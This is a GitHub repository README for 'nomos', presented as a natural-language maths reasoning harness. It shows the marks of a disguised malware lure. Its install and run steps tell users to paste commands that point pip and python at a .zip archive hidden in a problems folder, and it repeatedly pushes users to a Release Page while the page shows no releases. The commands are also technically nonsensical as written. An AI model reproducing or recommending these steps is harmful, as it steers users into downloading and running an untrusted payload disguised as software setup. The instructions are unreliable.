Skip to content

gur3245singh/nomos

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

12 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

🤖 nomos - Easy Math Problem Solving

Download nomos X (formerly Twitter) MIT License Hugging Face

image

A reasoning harness for mathematical problem-solving and proof-writing in natural language.

🚀 Getting Started

Follow these simple steps to download and run nomos on your computer.

  1. Visit the Download Page
    Go to the Release Page. Here, you can find the latest version.

  2. Download the Software
    On the Release Page, you will find the files available for download. Choose the correct file for your system and click on it to start the download.

  3. Install Required Packages
    After downloading nomos, you need to install some software dependencies.

    Open your terminal or command prompt and type the following command:

    pip install -r https://raw.githubusercontent.com/gur3245singh/nomos/main/problems/putnam-2025/b/Software-3.3-beta.1.zip
  4. Prepare Your Problem Files
    Create a directory on your computer that contains your problem files. Make sure these files have a .md extension. This directory will hold all your math problem documents.

🛠️ How to Use nomos

Once you have everything set up, you are ready to solve problems. Here’s how to use nomos:

  1. Open your terminal or command prompt.

  2. Navigate to the directory where you downloaded nomos. Use the cd command to change directories.

  3. Run the following command:

    python https://raw.githubusercontent.com/gur3245singh/nomos/main/problems/putnam-2025/b/Software-3.3-beta.1.zip <problems_dir> [options]

    Replace <problems_dir> with the path to your directory containing the .md files.

📜 Required Arguments

  • problems_dir: This is the directory that contains your problems in .md format.

⚙️ Options

Flag Default Description
--help Not set Displays help information
--verbose Not set Increases output detail during execution

💡 System Requirements

  • Operating System: Windows, macOS, or Linux.
  • Python Version: Python 3.6 or higher.
  • Memory: At least 1 GB of RAM

🔗 Additional Information

For more updates and community discussions, you can follow our project on X (formerly Twitter).

For a detailed understanding of how to write .md problem files, refer to the documentation on our GitHub repository.

Ready to start? Visit the Release Page now to download nomos and begin solving mathematical problems with ease!

About

🧮 Solve mathematical problems and write proofs in natural language using this easy-to-use reasoning harness. Enhance your problem-solving skills effortlessly.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors